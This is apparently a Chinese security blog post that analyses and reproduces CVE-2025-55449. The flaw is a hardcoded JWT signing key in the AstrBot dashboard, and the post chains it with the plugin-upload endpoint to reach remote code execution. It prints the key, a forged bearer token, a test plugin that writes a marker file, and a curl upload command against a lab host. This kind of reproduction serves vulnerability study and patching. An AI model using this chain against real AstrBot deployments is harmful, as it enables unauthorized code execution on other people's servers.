CVE-2025-55449漏洞复现

AstrBot 远程代码执行(CVE-2025-55449)漏洞复现

AstrBot 是一个开源的一站式 Agent 聊天机器人平台及开发框架。

主要功能

  1. 大模型对话。支持接入多种大模型服务。支持多模态、工具调用、MCP、原生知识库、人设等功能。
  2. 多消息平台支持。支持接入 QQ、企业微信、微信公众号、飞书、Telegram、钉钉、Discord、KOOK 等平台。支持速率限制、白名单、百度内容审核。
  3. Agent。完善适配的 Agentic 能力。支持多轮工具调用、内置沙盒代码执行器、网页搜索等功能。
  4. 插件扩展。深度优化的插件机制,支持开发插件扩展功能,社区插件生态丰富。
  5. WebUI。可视化配置和管理机器人,功能齐全。

漏洞描述

近日,奇安信CERT监测到官方修复AstrBot 远程代码执行漏洞(CVE-2025-55449),该漏洞源于 AstrBot 使用了固定的 JWT 签名密钥,攻击者可利用该密钥伪造任意有效的 JWT 认证令牌,完全绕过身份验证机制。成功绕过认证后,攻击者可访问插件管理接口,通过上传恶意的 Python 插件文件实现远程代码执行。**目前该漏洞POC和技术细节已在互联网上公开,**鉴于该漏洞影响范围较大,建议客户尽快做好自查及防护。

影响版本

AstrBot < 3.5.18

我们这里使用 3.5.17来复现

漏洞分析

先看看源码

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
// astrbot/dashboard/routes/auth.py

import jwt
import datetime
import asyncio
from .route import Route, Response, RouteContext
from quart import request
from astrbot.core import WEBUI_SK, DEMO_MODE
from astrbot import logger


class AuthRoute(Route):
    def __init__(self, context: RouteContext) -> None:
        super().__init__(context)
        self.routes = {
            "/auth/login": ("POST", self.login),
            "/auth/account/edit": ("POST", self.edit_account),
        }
        self.register_routes()

    async def login(self):
        username = self.config["dashboard"]["username"]
        password = self.config["dashboard"]["password"]
        post_data = await request.json
        if post_data["username"] == username and post_data["password"] == password:
            change_pwd_hint = False
            if (
                username == "astrbot"
                and password == "77b90590a8945a7d36c963981a307dc9"
                and not DEMO_MODE
            ):
                change_pwd_hint = True
                logger.warning("为了保证安全,请尽快修改默认密码。")

            return (
                Response()
                .ok(
                    {
                        "token": self.generate_jwt(username),
                        "username": username,
                        "change_pwd_hint": change_pwd_hint,
                    }
                )
                .__dict__
            )
        else:
            await asyncio.sleep(3)
            return Response().error("用户名或密码错误").__dict__

    async def edit_account(self):
        if DEMO_MODE:
            return (
                Response()
                .error("You are not permitted to do this operation in demo mode")
                .__dict__
            )

        password = self.config["dashboard"]["password"]
        post_data = await request.json

        if post_data["password"] != password:
            return Response().error("原密码错误").__dict__

        new_pwd = post_data.get("new_password", None)
        new_username = post_data.get("new_username", None)
        if not new_pwd and not new_username:
            return (
                Response().error("新用户名和新密码不能同时为空,你改了个寂寞").__dict__
            )

        if new_pwd:
            self.config["dashboard"]["password"] = new_pwd
        if new_username:
            self.config["dashboard"]["username"] = new_username

        self.config.save_config()

        return Response().ok(None, "修改成功").__dict__

    def generate_jwt(self, username):
        payload = {
            "username": username,
            "exp": datetime.datetime.utcnow() + datetime.timedelta(days=7),
        }
        token = jwt.encode(payload, WEBUI_SK, algorithm="HS256")  # 漏洞点
        return token

可以看到:

token = jwt.encode(payload, WEBUI_SK, algorithm=“HS256”)

这里使用了WEBUI_SK来加密生成jwt token

from astrbot.core import WEBUI_SK, DEMO_MODE导入了WEBUI_SK,找找看,然后找到这里:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
// astrbot/core/__init__.py

import os
import asyncio
from .log import LogManager, LogBroker  # noqa
from astrbot.core.utils.t2i.renderer import HtmlRenderer
from astrbot.core.utils.shared_preferences import SharedPreferences
from astrbot.core.utils.pip_installer import PipInstaller
from astrbot.core.db.sqlite import SQLiteDatabase
from astrbot.core.config.default import DB_PATH
from astrbot.core.config import AstrBotConfig
from astrbot.core.file_token_service import FileTokenService
from .utils.astrbot_path import get_astrbot_data_path

# 初始化数据存储文件夹
os.makedirs(get_astrbot_data_path(), exist_ok=True)

WEBUI_SK = "Advanced_System_for_Text_Response_and_Bot_Operations_Tool" #这里
DEMO_MODE = os.getenv("DEMO_MODE", False)

astrbot_config = AstrBotConfig()
t2i_base_url = astrbot_config.get("t2i_endpoint", "https://t2i.soulter.top/text2img")
html_renderer = HtmlRenderer(t2i_base_url)
logger = LogManager.GetLogger(log_name="astrbot")
db_helper = SQLiteDatabase(DB_PATH)
# 简单的偏好设置存储, 这里后续应该存储到数据库中, 一些部分可以存储到配置中
sp = SharedPreferences()
# 文件令牌服务
file_token_service = FileTokenService()
pip_installer = PipInstaller(
    astrbot_config.get("pip_install_arg", ""),
    astrbot_config.get("pypi_index_url", None),
)
web_chat_queue = asyncio.Queue(maxsize=32)
web_chat_back_queue = asyncio.Queue(maxsize=32)

可以看到这里硬编码了WEBUI_SK进去

看看token的验证逻辑:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
 // astrbot/dashboard/server.py
    
    async def srv_plug_route(self, subpath, *args, **kwargs):
        """
        插件路由
        """
        registered_web_apis = self.core_lifecycle.star_context.registered_web_apis
        for api in registered_web_apis:
            route, view_handler, methods, _ = api
            if route == f"/{subpath}" and request.method in methods:
                return await view_handler(*args, **kwargs)
        return jsonify(Response().error("未找到该路由").__dict__)

    async def auth_middleware(self):
        if not request.path.startswith("/api"):
            return
        allowed_endpoints = ["/api/auth/login", "/api/file"]
        if any(request.path.startswith(prefix) for prefix in allowed_endpoints):
            return
        # claim jwt
        token = request.headers.get("Authorization")
        if not token:
            r = jsonify(Response().error("未授权").__dict__)
            r.status_code = 401
            return r
        if token.startswith("Bearer "):
            token = token[7:]
        try:
            payload = jwt.decode(token, WEBUI_SK, algorithms=["HS256"])
            g.username = payload["username"]
        except jwt.ExpiredSignatureError:
            r = jsonify(Response().error("Token 过期").__dict__)
            r.status_code = 401
            return r
        except jwt.InvalidTokenError:
            r = jsonify(Response().error("Token 无效").__dict__)
            r.status_code = 401
            return r

只要能被解析且不过期的token都能过验证,这里可以伪造token来越权访问插件管理接口

看看怎么RCE:

由于应用自带插件扩展功能,允许用户上传自定义插件包,程序会进行解压后读取插件相关的信息并导入对象的Python文件执行代码。

在:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
// astrbot/dashboard/routes/plugin.py

class PluginRoute(Route):
    def __init__(
        self,
        context: RouteContext,
        core_lifecycle: AstrBotCoreLifecycle,
        plugin_manager: PluginManager,
    ) -> None:
        super().__init__(context)
        self.routes = {
            "/plugin/get": ("GET", self.get_plugins),
            "/plugin/install": ("POST", self.install_plugin),
            "/plugin/install-upload": ("POST", self.install_plugin_upload), # 这里
            "/plugin/update": ("POST", self.update_plugin),
            "/plugin/uninstall": ("POST", self.uninstall_plugin),
            "/plugin/market_list": ("GET", self.get_online_plugins),
            "/plugin/off": ("POST", self.off_plugin),
            "/plugin/on": ("POST", self.on_plugin),
            "/plugin/reload": ("POST", self.reload_plugins),
            "/plugin/readme": ("GET", self.get_plugin_readme),
            "/plugin/platform_enable/get": ("GET", self.get_plugin_platform_enable),
            "/plugin/platform_enable/set": ("POST", self.set_plugin_platform_enable),
        }
        self.core_lifecycle = core_lifecycle
        self.plugin_manager = plugin_manager
        self.register_routes()

可以看到/plugin/install-upload映射到self.install_plugin_upload

然后一步步走

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
 async def install_plugin_upload(self):
        if DEMO_MODE:
            return (
                Response()
                .error("You are not permitted to do this operation in demo mode")
                .__dict__
            )

        try:
            file = await request.files
            file = file["file"]
            logger.info(f"正在安装用户上传的插件 {file.filename}")
            file_path = f"data/temp/{file.filename}"
            await file.save(file_path)
            plugin_info = await self.plugin_manager.install_plugin_from_file(file_path) #here
            # self.core_lifecycle.restart()
            logger.info(f"安装插件 {file.filename} 成功")
            return Response().ok(plugin_info, "安装成功。").__dict__
        except Exception as e:
            logger.error(traceback.format_exc())
            return Response().error(str(e)).__dict__

再进install_plugin_from_file函数看看

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
// astrbot/core/star/star_manager.py

async def install_plugin_from_file(self, zip_file_path: str):
        dir_name = os.path.basename(zip_file_path).replace(".zip", "")
        dir_name = dir_name.removesuffix("-master").removesuffix("-main").lower()
        desti_dir = os.path.join(self.plugin_store_path, dir_name)
        self.updator.unzip_file(zip_file_path, desti_dir)

        # remove the zip
        try:
            os.remove(zip_file_path)
        except BaseException as e:
            logger.warning(f"删除插件压缩包失败: {e!s}")
        # await self.reload()
        await self.load(specified_dir_name=dir_name) # 这里

        # Get the plugin metadata to return repo info
        plugin = self.context.get_registered_star(dir_name)
        if not plugin:
            # Try to find by other name if directory name doesn't match plugin name
            for star in self.context.get_all_stars():
                if star.root_dir_name == dir_name:
                    plugin = star
                    break

        # Extract README.md content if exists
        readme_content = None
        readme_path = os.path.join(desti_dir, "README.md")
        if not os.path.exists(readme_path):
            readme_path = os.path.join(desti_dir, "readme.md")

        if os.path.exists(readme_path):
            try:
                with open(readme_path, encoding="utf-8") as f:
                    readme_content = f.read()
            except Exception as e:
                logger.warning(f"读取插件 {dir_name} 的 README.md 文件失败: {e!s}")

        plugin_info = None
        if plugin:
            plugin_info = {
                "repo": plugin.repo,
                "readme": readme_content,
                "name": plugin.name,
            }

        return plugin_info

我们看到有一个load,很熟悉,看看是不是我们想要的那个load

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
  async def load(self, specified_module_path=None, specified_dir_name=None):
       ......
                # 尝试导入模块
                try:
                    module = __import__(path, fromlist=[module_str])
                except (ModuleNotFoundError, ImportError):
                    # 尝试安装依赖
                    await self._check_plugin_dept_update(target_plugin=root_dir_name)
                    module = __import__(path, fromlist=[module_str])
                except Exception as e:
                    logger.error(traceback.format_exc())
                    logger.error(f"插件 {root_dir_name} 导入失败。原因:{e!s}")
                    continue
                    
    	......

在load里使用了__import__来导入自定义的插件代码文件

RCE链就串联起来了,PluginManager.install_plugin_from_file函数将上传的插件代码解压后交由load函数进行加载,结合jwt越权,导致恶意代码可能被执行。

漏洞复现

先写个插件,可以照模板写,找一个网上的:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
from astrbot.api.event import filter, AstrMessageEvent, MessageEventResult
from astrbot.api.star import Context, Star, register
from astrbot.api import logger

@register("helloworld", "YourName", "一个简单的 Hello World 插件", "1.0.0")
class MyPlugin(Star):
    def __init__(self, context: Context):
        super().__init__(context)

    async def initialize(self):
        with open('tmp/success', 'w') as f:
        	f.write('hacked!')

    # 注册指令的装饰器。指令名为 helloworld。注册成功后,发送 `/helloworld` 就会触发这个指令,并回复 `你好, {user_name}!`
    @filter.command("helloworld")
    async def helloworld(self, event: AstrMessageEvent):
        """这是一个 hello world 指令""" # 这是 handler 的描述,将会被解析方便用户了解插件内容。建议填写。
        user_name = event.get_sender_name()
        message_str = event.message_str # 用户发的纯文本消息字符串
        message_chain = event.get_messages() # 用户所发的消息的消息链 # from astrbot.api.message_components import *
        logger.info(message_chain)
        yield event.plain_result(f"Hello, {user_name}, 你发了 {message_str}!") # 发送一条纯文本消息

    async def terminate(self):
        """可选择实现异步的插件销毁方法,当插件被卸载/停用时会调用。"""

带token上传zip:

1
2
3
4
5
6
┌──(kali㉿kali)-[~/astrbot]
└─$ curl -X POST \
  -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFzdHJib3QiLCJleHAiOjE3NjQzNzUxMTB9.Mz9_VTb1yWP8q061MF0wVHDMG04_Oz7bKT-xFHdB3MM" \
  -F "file=@/home/kali/astrbot/helloworld-master.zip" \
  http://192.168.142.131:6185/api/plugin/install-upload
{"status":"ok","message":"\u5b89\u88c5\u6210\u529f\u3002","data":{"repo":"https://github.com/Soulter/helloworld","readme":"# helloworld\n\nAstrBot \u63d2\u4ef6\u6a21\u677f\n\nA template plugin for AstrBot plugin feature\n\n# \u652f\u6301\n\n[\u5e2e\u52a9\u6587\u6863](https://astrbot.app)\n","name":"helloworld"}}

发现成功执行了命令:

1
2
3
┌──(kali㉿kali)-[~]
└─$ cat /tmp/success
hacked!  

这里我测试的时候想弹shell但一直弹不到,在找poc的过程中发现了写内存马的方式,感觉蛮有启发意义的,不过这里就不写了

参考

【已复现】AstrBot 远程代码执行漏洞(CVE-2025-55449)安全风险通告

AstrBot 远程代码执行(CVE-2025-55449)漏洞分析

CVE-2025-55449

Licensed under CC BY-NC-SA 4.0
Build by Oight
使用 Hugo 构建
主题 StackJimmy 设计